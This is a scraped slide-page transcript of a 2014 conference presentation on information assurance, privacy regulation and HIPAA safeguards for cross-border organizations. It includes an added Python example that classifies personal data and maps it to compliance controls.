Malcolm Crompton, IIS Partners Irish Future Internet Forum - Socioeconomics
 
1Annotated BibliographyTamika S. BouldinLibe
1Annotated BibliographyTamika S. BouldinLibe1Annotated BibliographyTamika S. BouldinLibe
1Annotated BibliographyTamika S. BouldinLibe
 
CSMFO 2012 Data Privacy in Local Government
CSMFO 2012 Data Privacy in Local GovernmentCSMFO 2012 Data Privacy in Local Government
CSMFO 2012 Data Privacy in Local Government
 

More from WCIT 2014

WCIT 2014 Gary Beach - The Skills Gap
WCIT 2014 Gary Beach - The Skills GapWCIT 2014 Gary Beach - The Skills Gap
WCIT 2014 Gary Beach - The Skills GapWCIT 2014
 
Open Access - Activities of the Max-Planck-Gesellschaft
Open Access - Activities of the Max-Planck-GesellschaftOpen Access - Activities of the Max-Planck-Gesellschaft
Open Access - Activities of the Max-Planck-GesellschaftWCIT 2014
 
Implementación de un repositorio y de una política institucional de acceso ab...
Implementación de un repositorio y de una política institucional de acceso ab...Implementación de un repositorio y de una política institucional de acceso ab...
Implementación de un repositorio y de una política institucional de acceso ab...WCIT 2014
 
Acceso Abierto: experiencia de Brasil
Acceso Abierto: experiencia de BrasilAcceso Abierto: experiencia de Brasil
Acceso Abierto: experiencia de BrasilWCIT 2014
 
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...WCIT 2014
 
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...WCIT 2014
 
Redalyc: un modelo de Acceso Abierto desde México para Iberoamérica
Redalyc: un modelo de Acceso Abierto desde México para IberoaméricaRedalyc: un modelo de Acceso Abierto desde México para Iberoamérica
Redalyc: un modelo de Acceso Abierto desde México para IberoaméricaWCIT 2014
 
Latindex and Open Access
Latindex and Open AccessLatindex and Open Access
Latindex and Open AccessWCIT 2014
 
Repositorios de Acceso Abierto "La ruta verde Mexicana"
Repositorios de Acceso Abierto "La ruta verde Mexicana"Repositorios de Acceso Abierto "La ruta verde Mexicana"
Repositorios de Acceso Abierto "La ruta verde Mexicana"WCIT 2014
 
Open Access in Portugal: from UMinhoo to national initiatives
Open Access in Portugal: from UMinhoo to national initiativesOpen Access in Portugal: from UMinhoo to national initiatives
Open Access in Portugal: from UMinhoo to national initiativesWCIT 2014
 
Open Science: Expanding Frontiers in Research and Accelerating Innovation
Open Science: Expanding Frontiers in Research and Accelerating InnovationOpen Science: Expanding Frontiers in Research and Accelerating Innovation
Open Science: Expanding Frontiers in Research and Accelerating InnovationWCIT 2014
 
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...WCIT 2014
 
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...WCIT 2014
 
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...WCIT 2014
 
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...WCIT 2014
 
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in Jalisco
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in JaliscoWCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in Jalisco
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in JaliscoWCIT 2014
 
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...WCIT 2014
 
WCIT 2014 Andrew Stott - Implementing a successful government open data program
WCIT 2014 Andrew Stott - Implementing a successful government open data programWCIT 2014 Andrew Stott - Implementing a successful government open data program
WCIT 2014 Andrew Stott - Implementing a successful government open data programWCIT 2014
 
WCIT 2014 André Jean Marc Loechel - Living Labs
WCIT 2014 André Jean Marc Loechel - Living LabsWCIT 2014 André Jean Marc Loechel - Living Labs
WCIT 2014 André Jean Marc Loechel - Living LabsWCIT 2014
 
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructure
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructureWCIT 2014 Amnon Shvo - Translational & interoperable health infrastructure
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructureWCIT 2014
 

More from WCIT 2014 (20)

WCIT 2014 Gary Beach - The Skills Gap
WCIT 2014 Gary Beach - The Skills GapWCIT 2014 Gary Beach - The Skills Gap
WCIT 2014 Gary Beach - The Skills Gap
 
Open Access - Activities of the Max-Planck-Gesellschaft
Open Access - Activities of the Max-Planck-GesellschaftOpen Access - Activities of the Max-Planck-Gesellschaft
Open Access - Activities of the Max-Planck-Gesellschaft
 
Implementación de un repositorio y de una política institucional de acceso ab...
Implementación de un repositorio y de una política institucional de acceso ab...Implementación de un repositorio y de una política institucional de acceso ab...
Implementación de un repositorio y de una política institucional de acceso ab...
 
Acceso Abierto: experiencia de Brasil
Acceso Abierto: experiencia de BrasilAcceso Abierto: experiencia de Brasil
Acceso Abierto: experiencia de Brasil
 
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...
Avances del Acceso Abierto en Argentina y desafíos en el contexto latinoameri...
 
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...
Experiencia peruana: Ley 30035 para la creación del Repositorio Nacional Digi...
 
Redalyc: un modelo de Acceso Abierto desde México para Iberoamérica
Redalyc: un modelo de Acceso Abierto desde México para IberoaméricaRedalyc: un modelo de Acceso Abierto desde México para Iberoamérica
Redalyc: un modelo de Acceso Abierto desde México para Iberoamérica
 
Latindex and Open Access
Latindex and Open AccessLatindex and Open Access
Latindex and Open Access
 
Repositorios de Acceso Abierto "La ruta verde Mexicana"
Repositorios de Acceso Abierto "La ruta verde Mexicana"Repositorios de Acceso Abierto "La ruta verde Mexicana"
Repositorios de Acceso Abierto "La ruta verde Mexicana"
 
Open Access in Portugal: from UMinhoo to national initiatives
Open Access in Portugal: from UMinhoo to national initiativesOpen Access in Portugal: from UMinhoo to national initiatives
Open Access in Portugal: from UMinhoo to national initiatives
 
Open Science: Expanding Frontiers in Research and Accelerating Innovation
Open Science: Expanding Frontiers in Research and Accelerating InnovationOpen Science: Expanding Frontiers in Research and Accelerating Innovation
Open Science: Expanding Frontiers in Research and Accelerating Innovation
 
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...
WCIT 2014 Ramesh Krishnamurthy - Critical need for standardization of  e-heal...
 
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...
WCIT 2014 Reinhold Haux - Educational programs and courses in health informat...
 
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...
WCIT 2014 Som Mittal - Managing risks in an interdependent economy risks rela...
 
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...
WCIT 2014 Peter Elkin - Human computer interaction, evaluation, usability tes...
 
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in Jalisco
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in JaliscoWCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in Jalisco
WCIT 2014 Jaime Reyes - Innovation & entrepreneurship ecosystem in Jalisco
 
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...
WCIT 2014 Gail Breslow - Creativity, Collaboration, and Community: Inspiring ...
 
WCIT 2014 Andrew Stott - Implementing a successful government open data program
WCIT 2014 Andrew Stott - Implementing a successful government open data programWCIT 2014 Andrew Stott - Implementing a successful government open data program
WCIT 2014 Andrew Stott - Implementing a successful government open data program
 
WCIT 2014 André Jean Marc Loechel - Living Labs
WCIT 2014 André Jean Marc Loechel - Living LabsWCIT 2014 André Jean Marc Loechel - Living Labs
WCIT 2014 André Jean Marc Loechel - Living Labs
 
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructure
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructureWCIT 2014 Amnon Shvo - Translational & interoperable health infrastructure
WCIT 2014 Amnon Shvo - Translational & interoperable health infrastructure
 

Recently uploaded

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfSeasiaInfotech2
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Manik S Magar
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubKalema Edgar
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Commit University
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clashcharlottematthew16
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Enterprise Knowledge
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 

Recently uploaded (20)

WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
The Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdfThe Future of Software Development - Devin AI Innovative Approach.pdf
The Future of Software Development - Devin AI Innovative Approach.pdf
 
Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!Anypoint Exchange: It’s Not Just a Repo!
Anypoint Exchange: It’s Not Just a Repo!
 
Unleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding ClubUnleash Your Potential - Namagunga Girls Coding Club
Unleash Your Potential - Namagunga Girls Coding Club
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024
 
Powerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time ClashPowerpoint exploring the locations used in television show Time Clash
Powerpoint exploring the locations used in television show Time Clash
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piece
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptx
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 

Information Assurance Strategies for Cross-Border Organizations
PAGE 4
Trust and Societies: Quantifiable Impact
“If you take a broad enough definition of trust, then it would explain basically all the difference between the per capita income of the United States and Somalia,” ventures Steve Knack, a senior economist at the World Bank who has been studying the economics of trust for over a decade. That suggests that trust is worth $12.4 trillion dollars a year to the U.S., which, in case you are wondering, is 99.5% of this country’s income (2006 figures). If you make $40,000 a year, then $200 is down to hard work and $39,800 is down to trust” (http://www.forbes.com/2006/09/22/trust-economy-markets-tech_cx_th_06trust_0925harford.html)
“Trust is essential to maintaining the social and economic benefits that networked technologies bring to the United States and the rest of the world” (Consumer Data Privacy in a Networked World: A Framework for Protecting Privacy and Promoting Innovation in the Global Digital Economy, February 2012, White House)
“Trust is at the heart of today’s complex global economy. But, paradoxically, trust is also in increasingly short supply in many of our societies, especially in our attitudes towards big business, parliaments and governments. This decline threatens our capacity to tackle some of today’s key challenges” (http://www.oecd.org/forum/the-cost-of-mistrust.htm)
PAGE 5
The Impact of Lost Trust on Society
Financial Crisis: http://www.youtube.com/watch?v=uw_Tgu0txS0
PAGE 6
International Data Flows: The Global Currency
“The Growth of the Internet and the ability to move data rapidly and globally has been a key building block of the global economic order” (The Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The Brookings Institute, February 2013)
“Exports (emphasis mine) of cloud computing services were estimated to be worth approximately $1.5b in 2010 (and this is likely a conservative figure) and the market for cloud computing services is anticipated to grow by up to 600 percent by 2015” (“Policy Challenges of Cross-Border Computing”, Journal of International Commerce and Economics, November 2012)
 Over 2 billion individuals have access to the Internet
 More devices will be connected than people: billions of devices
 Nearly free transaction costs
 The days of information arbitrage are over
 Barriers to innovation and to exploitation are equally low
Critical Shared Data Sets
 Weather & Climate data
 Census data
 Healthcare and Disease Control data
 Financial & Currency data
 Trade data
A McKinsey Global Institute study estimated that the Internet accounted for over 10 percent of GDP growth over the last five years in the world’s top ten economies, and that for every job lost as a result of the Internet, 2.6 jobs have been created.
PAGE 7
Open Government Initiatives: Public Sector Data
Governments across the globe recognize that information is both:
 A national resource that requires protection
 A public good that should be readily disseminated
Key areas of focus within the Open Government community include:
 Transparency with budgets & procurement
 Private/Public Sector data sharing
 Innovation
“The original and essentially libertarian nature of the Internet is increasingly being challenged by assertions by government of jurisdiction over the Internet or the development of rules that restrict the ability of individuals and companies to access the Internet and move data across borders” (The Internet, Cross-Border Data Flows and International Trade, Joshua Meltzer, The Brookings Institute, February 2013)
  • 8. Why Information Assurance is Critical Now!
  Here’s just a quick sampling of what’s occurring on a daily basis. This is just the US public sector.
  Organized Criminals in Russia Steal 1b Passwords (8/5/2014)
  http://www.nytimes.com/2014/08/06/technology/russian-gang-said-to-amass-more-than-a-billion-stolen-internet-credentials.html?_r=0
  JP Morgan Potentially Compromised (8/18/2014)
  http://online.wsj.com/articles/fbi-probes-possible-computer-hacking-incident-at-j-p-morgan-1409168480
  Hospital Hacked: 4.5 Million Records Compromised (8/18/2014)
  http://money.cnn.com/2014/08/18/technology/security/hospital-chs-hack/
  Home Depot
  http://www.forbes.com/sites/quickerbettertech/2014/09/22/why-the-home-depot-breach-is-worse-than-you-think/
  Target
  http://online.wsj.com/news/articles/SB10001424052702304773104579266743230242538
  The Car (2014 Moving Forward)
  http://money.cnn.com/2014/06/01/technology/security/car-hack/
  • 9. The Assault on Healthcare & ePHI
  • According to a Ponemon Institute study, criminal attacks on healthcare systems have risen 100% since 2010, with an average breach cost of $2m (US)
  • Over 90% of healthcare organizations have had a breach in the last two years, with 38% having had more than five incidents (down from 45% the previous year)
  • Risks with mandated health information exchanges (third-party considerations): the weakest link, despite security standards from HIPAA-HITECH
  • Bring Your Own Device (BYOD): nearly 50% of breaches are attributed to a lost or stolen device, and over 88% of organizations allow the use of BYOD
  • Fortunately, the number of records compromised has decreased thanks to earlier detection and incident response; we’re getting better at handling security breaches…practice makes perfect?
  • 11. Security - Defined
  The easiest way to think about security is to think about the outcome that good security provides: confidentiality, integrity, and availability of information (CIA).
  Confidentiality is the end-state of ensuring that information is only viewed and acted upon by those individuals, organizations, or systems that are authorized to see it. “A loss of confidentiality is the unauthorized disclosure of information” (FIPS 199).
  Integrity is the end-state of information and its processing such that the information is believed to be complete, accurate, valid and subject to restricted access (CAVR): essentially, untampered with and not otherwise modified by unauthorized activity. “A loss of integrity is the unauthorized modification or destruction of information” (FIPS 199).
  Availability is simply that: the information is available for its required use without delay or loss. “A loss of availability is the disruption of access to or use of information or an information system” (FIPS 199).
  Collectively, IT security is the set of processes involved in ensuring that data and information meet the confidentiality, integrity, and availability objectives of the business.
  • 12. Privacy - Defined
  Definitions of privacy are growing more nuanced over time.
  Privacy is “the right to be left alone” (Samuel Warren & Louis Brandeis: The Right to Privacy, Harvard Law Review, 1890).
  Privacy is “the right of the individual to be protected against the intrusion into his (her) personal life or affairs, or those of his (her) family, by direct physical means or by publication of information” (UK, Calcutt Committee: 1997)
  Privacy has contextual considerations:
  • Information Privacy
  • Bodily Privacy
  • Territorial / Physical Privacy
  • Communications Privacy
  (Foundations of Information Privacy and Data Protection, Swire et al., IAPP, 2012)
  • 13. Information Assurance: Three Perspectives
  National Defense: Information Assurance as a concept is strongly influenced by the defense and national security communities and the concept of network-centric warfare techniques: “Measures that protect and defend information systems by ensuring their availability, integrity, authentication, confidentiality, and non-repudiation. This includes providing for restoration of information systems by incorporating protection, detection, and reaction capabilities” (Department of Defense Directive Number 8500.1: October 24, 2002)
  Corporate View: Intellectual Property, Financial, Client & Partner Data is subject to appropriate governance & control (CAVR).
  Consumer View: Personal Health, Financial and other PII Data is controlled by the individual, and disclosure is also controlled by the individual.
  • 14. Data Classification
  Given the regulatory and jurisdictional issues related to information and data flows, organizations need to implement best practices to classify their data. There are a number of approaches, including:
  National Security
  • Top Secret
  • Classified
  • Unclassified: FOUO
  Corporate Security
  • Confidential
  • Proprietary
  • Privileged / Restricted Access
  Personal Data
  • ePHI
  • Financial Information
  • Phone, Internet & Utility
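  A classification check in working form, as an added example (not part of the presentation): it labels a record against the slide's Personal Data scheme and returns the handling controls the deck elsewhere cites (HIPAA 164.312, GLB safeguards, PCI-DSS Requirements 3 and 4). The field-name hints, the SSN and card-number patterns, and the control mapping are constructed illustrative policy, not a legal mapping.

```python
"""Record classification against the slide's Personal Data scheme (added example,
not from the presentation). Field hints, patterns and HANDLING are constructed."""
import re

# Constructed: field names that suggest a Personal Data label from the slide
FIELD_HINTS = {
    "diagnosis": "ePHI", "mrn": "ePHI", "icd10": "ePHI",
    "ssn": "Financial Information", "account_number": "Financial Information",
    "phone": "Phone, Internet & Utility", "ip_address": "Phone, Internet & Utility",
}
# Constructed: handling required per label, citing references the deck lists
HANDLING = {
    "ePHI": ["HIPAA 164.312(a)(1) encryption/decryption",
             "HIPAA 164.312(b) audit controls",
             "HIPAA 164.312(e)(1) transmission security"],
    "Financial Information": ["GLB safeguards: restrict and monitor access",
                              "PCI-DSS Req 3 protect stored data / Req 4 encrypt transmission"],
    "Phone, Internet & Utility": ["Corporate Confidential handling; need-to-know access"],
}
SSN_RE = re.compile(r"^\d{3}-\d{2}-\d{4}$")   # US SSN shape (NPI under GLB)
PAN_RE = re.compile(r"^\d{13,19}$")           # candidate payment-card number


def luhn_ok(digits):
    """Luhn checksum: separates a real-looking PAN from an arbitrary digit string."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def classify_record(record):
    """Return the set of Personal Data labels found in a dict of field -> value."""
    labels = set()
    for name, value in record.items():
        if name.lower() in FIELD_HINTS:           # label by what the field is named
            labels.add(FIELD_HINTS[name.lower()])
        text = str(value)
        if SSN_RE.match(text) or (PAN_RE.match(text) and luhn_ok(text)):
            labels.add("Financial Information")   # label by what the value looks like
    return labels


def required_controls(labels):
    """Union of handling controls for the labels, deduplicated, in stable order."""
    controls = []
    for label in sorted(labels):
        for c in HANDLING.get(label, []):
            if c not in controls:
                controls.append(c)
    return controls


if __name__ == "__main__":
    # Constructed sample: a patient row that also carries a card number
    rec = {"mrn": "A-1001", "diagnosis": "J10", "card": "4111111111111111"}
    found = classify_record(rec)
    print(sorted(found))
    for c in required_controls(found):
        print(" -", c)
```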
  • 15. Information Lifecycle & IA
  [Figure sources: TechTarget, http://searchdatamanagement.techtarget.com/feature/Information-assurance-Dependability-and-security-of-networked-information-systems; Cloud Security Alliance]
  • 16. Bringing It All Together: IA, Security, and Privacy
  If we agree that information is the new global currency and that innovation and growth are predicated on the quality of the information and data we use, it’s important that we couple IA, Security and Privacy and make information governance a top priority for our organizations.
  Let’s get to work!
  • 17. Privacy Laws & Standards
  By Country / Region
  • Mexico
  • Canada
  • US
  • EU
  • APEC
  By Industry
  • HIPAA-HITECH
  • Financial Services
  • 18. Laws & Regulations: Mexico, Canada and US
  Mexico – National Privacy Law
  http://www.diputados.gob.mx/LeyesBiblio/pdf/LFPDPPP.pdf
  Canada – National Privacy Law
  https://www.priv.gc.ca/index_e.asp
  https://www.priv.gc.ca/leg_c/leg_c_p_e.asp
  US – Sectoral Approach (Federal Trade Commission)
  http://www.whitehouse.gov/sites/default/files/privacy-final.pdf
  States
  Massachusetts - http://www.mass.gov/ocabr/docs/idtheft/201cmr1700reg.pdf
  California - http://oag.ca.gov/ecrime/databreach/reporting
  Nevada - http://www.leg.state.nv.us/NRS/NRS-603A.html
  • 19. Laws & Regulations: Australia, APEC & Europe (EU)
  Australia
  http://www.oaic.gov.au/privacy/privacy-act/the-privacy-act
  http://www.oaic.gov.au/privacy/privacy-resources/privacy-fact-sheets/other/privacy-fact-sheet-17-australian-privacy-principles
  APEC
  http://www.apec.org/About-Us/About-APEC/Fact-Sheets/APEC-Privacy-Framework.aspx
  European Union
  http://europa.eu/about-eu/countries/member-countries/index_en.htm
  http://ec.europa.eu/dataprotectionofficer/legal_framework_en.htm
  https://safeharbor.export.gov/list.aspx (Safe Harbor Registrants)
  • 20. Privacy & Security – Inextricably Linked
  Security can exist without privacy, but privacy cannot exist without security. Consequently, privacy frameworks offer insights into good governance and security practices, though many standards and frameworks have been challenged by recent events, notably the Payment Card Industry Data Security Standard (PCI-DSS).
  • 21. International Privacy Regimes: APEC & OECD
  APEC (2004)
  • Preventing Harm
  • Notice
  • Collection Limitation
  • Uses of Personal Information
  • Choice
  • Integrity of Personal Information
  • Security Safeguards
  • Access and Correction
  • Accountability
  OECD (1980)
  • Collection Limitation Principle
  • Data Quality Principle
  • Purpose Specification Principle
  • Use Limitation Principle
  • Security Safeguards Principle
  • Openness Principle
  • Individual Participation Principle
  • Accountability
  • 22. International Privacy (Cont.): FIPS & Madrid
  FIPS (1973)
  • No Secret Repositories
  • Individual Control Over Use
  • Individual Consent
  • Correction
  • Precautions Against Misuse
  Madrid Resolution (2009)
  • Principle of Lawfulness & Fairness
  • Purpose Specification Principle
  • Proportionality Principle
  • Data Quality
  • Openness Principle
  • Accountability
  • 23. HIPAA-HITECH: Administrative, Physical & Technical
  Security Management Process (164.308(a)(1)): Risk Analysis, Risk Management, System Review
  Assigned Security Responsibility (164.308(a)(2)): Accountability
  Workforce Security (164.308(a)(3)): Authorization and/or Supervision, Clearance & Termination Procedures
  Information Access Management (164.308(a)(4)): RBAC Procedures
  Security Awareness and Training (164.308(a)(5)): Anti-malware, log-in procedures, password management
  Security Incident Procedures (164.308(a)(6)): Incident Response Procedures
  • 24. HIPAA-HITECH: Administrative, Physical & Technical
  Contingency Plan (164.308(a)(7)): Backup & Recovery, BC/DR Procedures & Testing, Applications and Data Criticality Analysis
  Evaluation (164.308(a)(8)): Review of Systems
